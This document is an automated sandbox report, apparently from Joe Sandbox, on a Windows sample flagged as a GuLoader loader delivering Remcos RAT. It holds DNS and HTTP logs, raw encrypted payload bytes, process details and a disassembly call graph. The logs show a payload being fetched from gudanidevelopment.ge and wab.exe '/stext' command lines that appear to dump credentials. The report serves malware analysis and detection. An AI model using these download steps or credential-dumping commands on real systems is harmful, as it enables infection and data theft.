Oct 26, 2023 14:28:50.276218891 CEST | 1.1.1.1 | 192.168.11.20 | 0x3386 | Name error (3) | ourt2949aslumes9.duckdns.org | none | none | A (IP address) | IN (0x0001) | false
Oct 26, 2023 14:28:51.203661919 CEST | 1.1.1.1 | 192.168.11.20 | 0x3ef8 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                  • gudanidevelopment.ge
                                                                                                                                                                                                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 50054 | 217.147.225.69 | 80 | C:\Program Files (x86)\Windows Mail\wab.exe
Timestamp | kBytes transferred | Direction | Data
Oct 26, 2023 14:28:47.709543943 CEST | 8 | OUT | GET /IogvoayYhe139.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
    Host: gudanidevelopment.ge
    Cache-Control: no-cache
Oct 26, 2023 14:28:48.015140057 CEST | 9 | IN | HTTP/1.1 200 OK
    Date: Thu, 26 Oct 2023 12:28:47 GMT
    Server: Apache
    Last-Modified: Thu, 26 Oct 2023 08:16:56 GMT
    Accept-Ranges: bytes
    Content-Length: 494656
    Cache-Control: s-maxage=10
    Content-Type: application/octet-stream
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015237093 CEST10INData Raw: 66 ae eb 59 4a ae a6 0b c8 e5 25 6c 01 5c b6 b4 b9 c5 30 10 4f 66 1a e6 84 cd c9 64 04 7e 68 d6 37 22 e2 ee 16 5d 77 1c 22 b5 2b 54 42 c3 ee 1a 1c cc db fc 1e 91 93 e9 53 1e 52 29 57 a0 10 57 ea d9 9f cf 0c 58 c3 46 c0 e7 cf 11 ec ba cf ca 98 e0
                                                                                                                                                                                                                  Data Ascii: fYJ%l\0Ofd~h7"]w"+TBSR)WWXFSXyb4MZq>0+ye$sE#149QYUEo9&0(nWI_z)v2#_2D<2L@ai9h2<}{$0a"_R:1q:+
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015315056 CEST12INData Raw: d5 2c 18 85 9d 47 4d 26 b0 ad 5c 08 7b dc 48 64 db 98 5c e6 cc c5 d5 c6 b9 89 9f 56 85 55 00 2e 92 27 e2 17 e5 5d c5 45 01 00 88 c3 f9 bd d9 50 74 d6 55 28 9b 5f 1d 7d 6a 81 e7 a5 cf 0d 91 f4 a0 96 79 ab 81 ac b1 f2 ea 82 fb 02 6f f8 93 ec 4c 88
                                                                                                                                                                                                                  Data Ascii: ,GM&\{Hd\VU.']EPtU(_}jyoLcVX]_+(P)^VV]_1<*U_=iR;-j[=\||+,p)6!k3k*PU(,x6uS$)SNy*pI>M$$va8A""o_<X/
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015440941 CEST13INData Raw: f4 53 a9 bf a8 2e b4 60 17 2d 48 59 92 f8 bf 94 2d 3d ec 3f ee 65 8b 8c 07 55 ed af 5b 90 ea 80 47 85 31 f5 b6 99 5e b1 cb 20 5f 77 e6 66 81 2f af 76 91 86 4d fc b4 44 25 2c b3 35 90 30 e9 80 eb 84 05 03 4f 26 48 af f7 ca d0 54 0c 2e 02 25 af c9
                                                                                                                                                                                                                  Data Ascii: S.`-HY-=?eU[G1^ _wf/vMD%,50O&HT.%F6{8CxM)1d|[m9^PrAxR)Z!QG/0vn7h`<Cl45#h}]sP4`1&3<(bpbL9,Kc/i
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015559912 CEST14INData Raw: 1c 34 f9 6a 6c d1 16 f1 ac 20 0c aa c3 86 2e f9 bb 54 21 04 24 1e fb 48 8c 9b 89 6d 5b 21 d0 3d d9 c5 00 60 57 ce df 8a 6e 63 79 81 7d 32 7a 02 6f 97 f6 c2 32 b5 e7 03 cd 7b b6 51 c2 9e 80 6b 94 92 46 fc f3 94 ce b8 7e 91 94 50 9e c1 9e 26 7b 5c
                                                                                                                                                                                                                  Data Ascii: 4jl .T!$Hm[!=`Wncy}2zo2{QkF~P&{\b'<>[Tbwu}>r!1{anvE%-8Skx(zGVzRb!^5d!xfTRa23`1&zG>]`1}[Z0pBw}vo|)<{d0{<
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015677929 CEST16INData Raw: 6d e1 10 05 15 f7 db eb 49 1e f4 fc 9e 07 94 4f 3b 39 b8 d4 54 5d 71 c0 f0 e6 a6 04 ac be ba b9 8a b7 5d 63 f6 ca 33 8b ff 46 2a 10 71 a4 4d 80 80 77 ed fa 56 bd d5 58 17 c4 89 76 26 3a 80 37 ca 96 a6 5f bd ea 79 2d 4d 1c 05 89 c0 05 ba ca 14 e1
                                                                                                                                                                                                                  Data Ascii: mIO;9T]q]c3F*qMwVXv&:7_y-M"/'Ys+o5 WlNsw[1f}>_ejE3u013|ffUk\((khas}-$_8b{qv;*9?ox"
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015793085 CEST17INData Raw: ac d4 4c d0 9d 46 d3 04 ea 57 0c df 72 81 64 04 a7 50 ed cc 03 fb 64 78 ab 84 e7 ec fb e5 c6 b4 76 76 a9 8d 14 36 a9 be 0a 7d 53 8b bb 13 c7 86 2d ec 66 83 3b fa f1 b9 cb 89 46 29 83 40 4f 35 81 ae 56 45 26 25 eb e9 0c db c7 f1 ec 71 c7 3f 3c 7e
                                                                                                                                                                                                                  Data Ascii: LFWrdPdxvv6}S-f;F)@O5VE&%q?<~(M crqyn1dEIdb#qN#~51^_*\iX&9knJBP\%a`g+ESRs`AoDQi<LY$(mmrVPX=U
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015872955 CEST18INData Raw: db 2a 49 a5 e9 17 80 12 3d 74 a2 bf b4 0c c9 96 45 0c b7 c8 89 20 1d c1 0d cf be b4 88 f5 55 59 0f 9b c0 a5 6c 2a 45 d6 e7 fb 07 b3 cf 9b d9 b4 b1 45 30 7b 8b 50 83 ea 87 e5 32 cf 39 46 8d d8 67 09 bb 7d 12 27 9e 2f a1 06 c7 ed c1 7b 05 b6 e8 a6
                                                                                                                                                                                                                  Data Ascii: *I=tE UYl*EE0{P29Fg}'/{g+Z9rdtjygz8dA`*QCB/$Gz{KXZz]hf3B)Y@U;I}t =ML4u-t_ZCDE%_^d8Rd
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.015971899 CEST20INData Raw: 18 45 07 35 c0 8b 53 8e fc 60 07 4c ba ad 8b 71 c8 54 db 68 a6 60 9e 69 dd 76 88 7f 1a 67 4c 20 43 5c 98 35 6e 1e 93 c3 68 ea 67 34 b1 2a 0f 62 6d bf 6d 44 00 27 10 49 e8 82 ce 7b d4 58 c0 66 80 89 41 d1 a1 46 0c 1a b5 55 5a e2 2d 11 55 48 e7 78
                                                                                                                                                                                                                  Data Ascii: E5S`LqTh`ivgL C\5nhg4*bmmD'I{XfAFUZ-UHxn2*6Peg!2$l7CQhO%+< ,G}@PHV(!BsG_Iuq|m~i[7|l%6g-x^C6[68^='v
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.016153097 CEST21INData Raw: 7d 33 d8 58 67 ba 45 07 94 61 6b be ea d7 b1 6b 33 72 eb 0f 87 c6 32 76 1f 9f 88 ec 73 97 e7 40 6d a7 83 7f ff a4 17 34 ee 75 ab f8 8d ad 9d e3 52 17 91 ca 35 70 26 c1 77 51 c9 71 61 b3 02 0e e7 33 d4 5c a5 17 2c 61 41 0c 6d c8 56 ae 6d 9d 16 e5
                                                                                                                                                                                                                  Data Ascii: }3XgEakk3r2vs@m4uR5p&wQqa3\,aAmVmrks$FmkU5yP?Z1//q1Xv0E:u\zaM^ZZ<G9*P%eq&<5>{3f9a>o%ere]H#b@
                                                                                                                                                                                                                  Oct 26, 2023 14:28:48.318902016 CEST23INData Raw: 59 f7 86 e2 f2 48 a3 f4 ed 66 4f 57 ad ee e6 23 21 ef 33 9e 8c 28 4e 0b dd 59 46 9a 10 20 12 f2 72 7d b5 67 0d 84 03 d9 7b 79 9a 81 a2 d6 07 e2 c6 77 4c e3 01 55 b1 5b 98 12 63 4a 48 d4 55 28 7e 22 8c fc 54 b5 87 fb 52 b5 f4 63 44 3a ac ef fa fa
                                                                                                                                                                                                                  Data Ascii: YHfOW#!3(NYF r}g{ywLU[cJHU(~"TRcD:A9!w}?_nmG?-Rb+LUimI}1" aoXMz!\pMR281pqS3H#s'owm/8H)BF~9=!X Y


Session ID:1
Source IP:192.168.11.20
Source Port:50057
Destination IP:178.237.33.50
Destination Port:80
Process:C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp:Oct 26, 2023 14:28:51.455518007 CEST
kBytes transferred:529
Direction:OUT
Data:
GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Timestamp:Oct 26, 2023 14:28:51.707737923 CEST
kBytes transferred:536
Direction:IN
Data:
HTTP/1.1 200 OK
date: Thu, 26 Oct 2023 12:28:51 GMT
server: Apache/2.4.52 (Ubuntu)
content-length: 958
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
                                                                                                                                                                                                                  Data Ascii: { "geoplugin_request":"102.129.153.223", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite data created by MaxMind, available from <a href='http:\/\/www.maxmind.com'>http:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}



                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                  Start time:14:28:30
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  File size:734'679 bytes
                                                                                                                                                                                                                  MD5 hash:8B1422D6B17DD727C69291AA1FF09481
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.49572727235.0000000003718000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                  Start time:14:28:36
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.54464219226.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                  Target ID:9
                                                                                                                                                                                                                  Start time:14:28:51
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\oicgkvnekjmivsgoxokizzeblgyngayb
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                                  Start time:14:28:51
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rdhzl
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  Target ID:11
                                                                                                                                                                                                                  Start time:14:28:51
                                                                                                                                                                                                                  Start date:26/10/2023
                                                                                                                                                                                                                  Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\bxujegjz
                                                                                                                                                                                                                  Imagebase:0xfa0000
                                                                                                                                                                                                                  File size:516'608 bytes
                                                                                                                                                                                                                  MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                    Execution Coverage:21.4%
                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                    Signature Coverage:19.7%
                                                                                                                                                                                                                    Total number of Nodes:1548
                                                                                                                                                                                                                    Total number of Limit Nodes:40
4321->4327 4328 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4323->4328 4329 403888 4323->4329 4325 4036c4 4331 405c97 18 API calls 4325->4331 4326 40372a 4332 40588b 5 API calls 4326->4332 4328->4329 4333 406694 5 API calls 4329->4333 4330->4325 4330->4326 4335 4036d0 4331->4335 4336 40372f lstrcatW 4332->4336 4334 40388f 4333->4334 4337 4038a4 ExitWindowsEx 4334->4337 4340 4038b1 4334->4340 4335->4308 4463 4062ba lstrcpynW 4335->4463 4338 403740 lstrcatW 4336->4338 4339 40374b lstrcatW lstrcmpiW 4336->4339 4337->4322 4337->4340 4338->4339 4339->4308 4342 403767 4339->4342 4477 40140b 4340->4477 4343 403773 4342->4343 4344 40376c 4342->4344 4348 40586e 2 API calls 4343->4348 4347 4057f1 4 API calls 4344->4347 4346 4036df 4464 4062ba lstrcpynW 4346->4464 4350 403771 4347->4350 4351 403778 SetCurrentDirectoryW 4348->4351 4350->4351 4352 403793 4351->4352 4353 403788 4351->4353 4473 4062ba lstrcpynW 4352->4473 4472 4062ba lstrcpynW 4353->4472 4356 4062dc 17 API calls 4357 4037d2 DeleteFileW 4356->4357 4358 4037df CopyFileW 4357->4358 4363 4037a1 4357->4363 4358->4363 4359 403828 4361 406080 36 API calls 4359->4361 4360 406080 36 API calls 4360->4363 4361->4308 4362 4062dc 17 API calls 4362->4363 4363->4356 4363->4359 4363->4360 4363->4362 4365 403813 CloseHandle 4363->4365 4474 4058a3 CreateProcessW 4363->4474 4365->4363 4366->4291 4367->4293 4369 40654e 5 API calls 4368->4369 4371 40336a 4369->4371 4370 403374 4370->4298 4371->4370 4372 405b8f 3 API calls 4371->4372 4373 40337c 4372->4373 4374 40586e 2 API calls 4373->4374 4375 403382 4374->4375 4480 405ddf 4375->4480 4484 405db0 GetFileAttributesW CreateFileW 4378->4484 4380 402f1d 4381 402f2d 4380->4381 4485 4062ba lstrcpynW 4380->4485 4381->4307 4383 402f43 4384 405bdb 2 API calls 4383->4384 4385 402f49 4384->4385 4486 4062ba lstrcpynW 4385->4486 4387 402f54 GetFileSize 4402 402f6b 4387->4402 4403 403050 4387->4403 4389 403331 ReadFile 4389->4402 4390 403059 4390->4381 4391 403089 GlobalAlloc 4390->4391 
4499 403347 SetFilePointer 4390->4499 4498 403347 SetFilePointer 4391->4498 4393 4030bc 4396 402e79 6 API calls 4393->4396 4395 4030a4 4398 403116 31 API calls 4395->4398 4396->4381 4397 403072 4399 403331 ReadFile 4397->4399 4404 4030b0 4398->4404 4400 40307d 4399->4400 4400->4381 4400->4391 4401 402e79 6 API calls 4401->4402 4402->4381 4402->4389 4402->4393 4402->4401 4402->4403 4487 402e79 4403->4487 4404->4381 4404->4404 4405 4030ed SetFilePointer 4404->4405 4405->4381 4407 406694 5 API calls 4406->4407 4408 4039be 4407->4408 4409 4039c4 4408->4409 4410 4039d6 4408->4410 4512 406201 wsprintfW 4409->4512 4411 406188 3 API calls 4410->4411 4412 403a06 4411->4412 4414 403a25 lstrcatW 4412->4414 4415 406188 3 API calls 4412->4415 4416 4039d4 4414->4416 4415->4414 4504 403c80 4416->4504 4419 405c97 18 API calls 4420 403a57 4419->4420 4421 403aeb 4420->4421 4423 406188 3 API calls 4420->4423 4422 405c97 18 API calls 4421->4422 4424 403af1 4422->4424 4425 403a89 4423->4425 4426 403b01 LoadImageW 4424->4426 4427 4062dc 17 API calls 4424->4427 4425->4421 4433 403aaa lstrlenW 4425->4433 4437 405bbc CharNextW 4425->4437 4428 403ba7 4426->4428 4429 403b28 RegisterClassW 4426->4429 4427->4426 4432 40140b 2 API calls 4428->4432 4430 403bb1 4429->4430 4431 403b5e SystemParametersInfoW CreateWindowExW 4429->4431 4430->4308 4431->4428 4436 403bad 4432->4436 4434 403ab8 lstrcmpiW 4433->4434 4435 403ade 4433->4435 4434->4435 4438 403ac8 GetFileAttributesW 4434->4438 4439 405b8f 3 API calls 4435->4439 4436->4430 4442 403c80 18 API calls 4436->4442 4440 403aa7 4437->4440 4441 403ad4 4438->4441 4443 403ae4 4439->4443 4440->4433 4441->4435 4444 405bdb 2 API calls 4441->4444 4445 403bbe 4442->4445 4513 4062ba lstrcpynW 4443->4513 4444->4435 4447 403bca ShowWindow 4445->4447 4448 403c4d 4445->4448 4450 406624 3 API calls 4447->4450 4514 4053f5 OleInitialize 4448->4514 4455 403be2 4450->4455 4451 403c53 4452 403c57 4451->4452 4453 403c6f 4451->4453 4452->4430 4461 40140b 2 API calls 
4452->4461 4456 40140b 2 API calls 4453->4456 4454 403bf0 GetClassInfoW 4458 403c04 GetClassInfoW RegisterClassW 4454->4458 4459 403c1a DialogBoxParamW 4454->4459 4455->4454 4457 406624 3 API calls 4455->4457 4456->4430 4457->4454 4458->4459 4460 40140b 2 API calls 4459->4460 4460->4430 4461->4430 4462->4313 4463->4346 4464->4309 4466 4038e8 4465->4466 4467 4038da CloseHandle 4465->4467 4532 403915 4466->4532 4467->4466 4470 4059cc 67 API calls 4471 403703 OleUninitialize 4470->4471 4471->4319 4471->4320 4472->4352 4473->4363 4475 4058e2 4474->4475 4476 4058d6 CloseHandle 4474->4476 4475->4363 4476->4475 4478 401389 2 API calls 4477->4478 4479 401420 4478->4479 4479->4322 4481 405dec GetTickCount GetTempFileNameW 4480->4481 4482 405e22 4481->4482 4483 40338d 4481->4483 4482->4481 4482->4483 4483->4298 4484->4380 4485->4383 4486->4387 4488 402e82 4487->4488 4489 402e9a 4487->4489 4490 402e92 4488->4490 4491 402e8b DestroyWindow 4488->4491 4492 402ea2 4489->4492 4493 402eaa GetTickCount 4489->4493 4490->4390 4491->4490 4500 4066d0 4492->4500 4495 402eb8 CreateDialogParamW ShowWindow 4493->4495 4496 402edb 4493->4496 4495->4496 4496->4390 4498->4395 4499->4397 4501 4066ed PeekMessageW 4500->4501 4502 4066e3 DispatchMessageW 4501->4502 4503 402ea8 4501->4503 4502->4501 4503->4390 4505 403c94 4504->4505 4521 406201 wsprintfW 4505->4521 4507 403d05 4522 403d39 4507->4522 4509 403a35 4509->4419 4510 403d0a 4510->4509 4511 4062dc 17 API calls 4510->4511 4511->4510 4512->4416 4513->4421 4525 40427d 4514->4525 4516 405418 4520 40543f 4516->4520 4528 401389 4516->4528 4517 40427d SendMessageW 4518 405451 OleUninitialize 4517->4518 4518->4451 4520->4517 4521->4507 4523 4062dc 17 API calls 4522->4523 4524 403d47 SetWindowTextW 4523->4524 4524->4510 4526 404295 4525->4526 4527 404286 SendMessageW 4525->4527 4526->4516 4527->4526 4530 401390 4528->4530 4529 4013fe 4529->4516 4530->4529 4531 4013cb MulDiv SendMessageW 4530->4531 4531->4530 4534 403923 4532->4534 4533 4038ed 
4533->4470 4534->4533 4535 403928 FreeLibrary GlobalFree 4534->4535 4535->4533 4535->4535 5364 40190f 5365 402c41 17 API calls 5364->5365 5366 401916 5365->5366 5367 405920 MessageBoxIndirectW 5366->5367 5368 40191f 5367->5368 5369 401491 5370 405322 24 API calls 5369->5370 5371 401498 5370->5371 5372 401d14 5373 402c1f 17 API calls 5372->5373 5374 401d1b 5373->5374 5375 402c1f 17 API calls 5374->5375 5376 401d27 GetDlgItem 5375->5376 5377 402592 5376->5377 4730 405296 4731 4052a6 4730->4731 4732 4052ba 4730->4732 4733 4052ac 4731->4733 4743 405303 4731->4743 4734 4052c2 IsWindowVisible 4732->4734 4735 4052e2 4732->4735 4737 40427d SendMessageW 4733->4737 4738 4052cf 4734->4738 4734->4743 4736 405308 CallWindowProcW 4735->4736 4749 404c6c 4735->4749 4739 4052b6 4736->4739 4737->4739 4744 404bec SendMessageW 4738->4744 4743->4736 4745 404c4b SendMessageW 4744->4745 4746 404c0f GetMessagePos ScreenToClient SendMessageW 4744->4746 4747 404c43 4745->4747 4746->4747 4748 404c48 4746->4748 4747->4735 4748->4745 4758 4062ba lstrcpynW 4749->4758 4751 404c7f 4759 406201 wsprintfW 4751->4759 4753 404c89 4754 40140b 2 API calls 4753->4754 4755 404c92 4754->4755 4760 4062ba lstrcpynW 4755->4760 4757 404c99 4757->4743 4758->4751 4759->4753 4760->4757 5378 402598 5379 4025c7 5378->5379 5380 4025ac 5378->5380 5381 4025fb 5379->5381 5382 4025cc 5379->5382 5383 402c1f 17 API calls 5380->5383 5385 402c41 17 API calls 5381->5385 5384 402c41 17 API calls 5382->5384 5388 4025b3 5383->5388 5386 4025d3 WideCharToMultiByte lstrlenA 5384->5386 5387 402602 lstrlenW 5385->5387 5386->5388 5387->5388 5389 40262f 5388->5389 5390 402645 5388->5390 5392 405e91 5 API calls 5388->5392 5389->5390 5391 405e62 WriteFile 5389->5391 5391->5390 5392->5389 5393 6f2622fd 5394 6f262367 5393->5394 5395 6f262372 GlobalAlloc 5394->5395 5396 6f262391 5394->5396 5395->5394 4896 404c9e GetDlgItem GetDlgItem 4897 404cf0 7 API calls 4896->4897 4905 404f09 4896->4905 4898 404d93 DeleteObject 4897->4898 4899 404d86 
SendMessageW 4897->4899 4900 404d9c 4898->4900 4899->4898 4902 404dab 4900->4902 4903 404dd3 4900->4903 4901 404fed 4908 405099 4901->4908 4914 405281 4901->4914 4915 405046 SendMessageW 4901->4915 4904 4062dc 17 API calls 4902->4904 4907 404231 18 API calls 4903->4907 4909 404db5 SendMessageW SendMessageW 4904->4909 4905->4901 4906 404fce 4905->4906 4912 404f69 4905->4912 4906->4901 4917 404fdf SendMessageW 4906->4917 4913 404de7 4907->4913 4910 4050a3 SendMessageW 4908->4910 4911 4050ab 4908->4911 4909->4900 4910->4911 4918 4050d4 4911->4918 4924 4050c4 4911->4924 4925 4050bd ImageList_Destroy 4911->4925 4919 404bec 5 API calls 4912->4919 4920 404231 18 API calls 4913->4920 4916 404298 8 API calls 4914->4916 4915->4914 4922 40505b SendMessageW 4915->4922 4923 40528f 4916->4923 4917->4901 4921 405243 4918->4921 4942 404c6c 4 API calls 4918->4942 4947 40510f 4918->4947 4941 404f7a 4919->4941 4928 404df5 4920->4928 4921->4914 4930 405255 ShowWindow GetDlgItem ShowWindow 4921->4930 4929 40506e 4922->4929 4924->4918 4926 4050cd GlobalFree 4924->4926 4925->4924 4926->4918 4927 404eca GetWindowLongW SetWindowLongW 4931 404ee3 4927->4931 4928->4927 4934 404e45 SendMessageW 4928->4934 4936 404ec4 4928->4936 4939 404e81 SendMessageW 4928->4939 4940 404e92 SendMessageW 4928->4940 4935 40507f SendMessageW 4929->4935 4930->4914 4932 404f01 4931->4932 4933 404ee9 ShowWindow 4931->4933 4953 404266 SendMessageW 4932->4953 4952 404266 SendMessageW 4933->4952 4934->4928 4935->4908 4936->4927 4936->4931 4939->4928 4940->4928 4941->4906 4942->4947 4943 404efc 4943->4914 4944 405219 InvalidateRect 4944->4921 4945 40522f 4944->4945 4954 404ba7 4945->4954 4946 40513d SendMessageW 4948 405153 4946->4948 4947->4946 4947->4948 4948->4944 4949 4051b4 4948->4949 4951 4051c7 SendMessageW SendMessageW 4948->4951 4949->4951 4951->4948 4952->4943 4953->4905 4957 404ade 4954->4957 4956 404bbc 4956->4921 4958 404af7 4957->4958 4959 4062dc 17 API calls 4958->4959 4960 404b5b 4959->4960 4961 4062dc 
17 API calls 4960->4961 4962 404b66 4961->4962 4963 4062dc 17 API calls 4962->4963 4964 404b7c lstrlenW wsprintfW SetDlgItemTextW 4963->4964 4964->4956 5397 40149e 5398 4014ac PostQuitMessage 5397->5398 5399 4022f7 5397->5399 5398->5399 5400 401c1f 5401 402c1f 17 API calls 5400->5401 5402 401c26 5401->5402 5403 402c1f 17 API calls 5402->5403 5404 401c33 5403->5404 5405 402c41 17 API calls 5404->5405 5408 401c48 5404->5408 5405->5408 5406 401c63 5411 402c1f 17 API calls 5406->5411 5407 401caf 5412 402c41 17 API calls 5407->5412 5409 402c41 17 API calls 5408->5409 5410 401c58 5408->5410 5409->5410 5410->5406 5410->5407 5413 401c68 5411->5413 5414 401cb4 5412->5414 5415 402c1f 17 API calls 5413->5415 5416 402c41 17 API calls 5414->5416 5417 401c74 5415->5417 5418 401cbd FindWindowExW 5416->5418 5419 401c81 SendMessageTimeoutW 5417->5419 5420 401c9f SendMessageW 5417->5420 5421 401cdf 5418->5421 5419->5421 5420->5421 5422 402aa0 SendMessageW 5423 402ac5 5422->5423 5424 402aba InvalidateRect 5422->5424 5424->5423 5425 402821 5426 402827 5425->5426 5427 402ac5 5426->5427 5428 40282f FindClose 5426->5428 5428->5427 5429 4043a1 lstrlenW 5430 4043c0 5429->5430 5431 4043c2 WideCharToMultiByte 5429->5431 5430->5431 5432 404722 5433 40474e 5432->5433 5434 40475f 5432->5434 5493 405904 GetDlgItemTextW 5433->5493 5436 40476b GetDlgItem 5434->5436 5441 4047ca 5434->5441 5439 40477f 5436->5439 5437 4048ae 5442 404a5d 5437->5442 5495 405904 GetDlgItemTextW 5437->5495 5438 404759 5440 40654e 5 API calls 5438->5440 5444 404793 SetWindowTextW 5439->5444 5445 405c3a 4 API calls 5439->5445 5440->5434 5441->5437 5441->5442 5446 4062dc 17 API calls 5441->5446 5449 404298 8 API calls 5442->5449 5448 404231 18 API calls 5444->5448 5450 404789 5445->5450 5451 40483e SHBrowseForFolderW 5446->5451 5447 4048de 5452 405c97 18 API calls 5447->5452 5453 4047af 5448->5453 5454 404a71 5449->5454 5450->5444 5458 405b8f 3 API calls 5450->5458 5451->5437 5455 404856 CoTaskMemFree 5451->5455 5456 4048e4 
